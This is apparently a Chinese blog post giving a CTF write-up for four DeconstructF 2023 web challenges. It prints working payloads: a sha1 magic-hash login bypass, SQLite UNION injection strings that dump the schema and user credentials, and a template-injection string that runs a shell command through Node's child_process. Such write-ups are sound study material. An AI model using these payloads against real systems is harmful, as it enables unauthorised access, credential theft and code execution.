Deconstructf-2023-WEB

比赛比较简单,只做web,也是ak了。

where-are-the-cookies

 查看robots.txt

cookie是no的base64编码,改成yes的base64即可

 

 

why-are-types-weird

 password为  sha1('aaroZmOk') //0e66507019969427134894567494305185566735,sha1后开头是0通过若比较,登入进去

尝试注入,根据报错发现是sqlite,进行注入

-1 union select 1,2,(select sql from sqlite_master limit 0,1)--

-1 union select 1,2,(select group_concat(username,password) from power_users);

 

 

 

debugzero

 访问console,可以发现是flask

 一开始以为是伪造pin码,发现没有地方可以读取文件或者ssti。实际上是一开始的解码源码

打开css可以发现pin码。。。

 

 

 

gitcha

git泄露,拿到源码

注意到这里有渲染,尝试ssti

 checkAdmin直接改cookie绕过即可

注入

{{range.constructor("return global.process.mainModule.require('child_process').execSync('cat flag.txt')")()}}

 

 

 

 

 

 

 

 

 

 

 

 
posted @   Aninock  阅读(33)  评论(0编辑  收藏  举报
相关博文:
·  AmateursCTF 2023-sanity
·  CTFSHOW-日刷-春节欢乐赛
·  Polar靶场web通关记录
·  ISCTF2023_web怪题复现
·  Dest0g3-web部分wp
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示
AI IDE Trae
主题色彩
主题色彩
主题色彩
主题色彩
主题色彩
主题色彩
主题色彩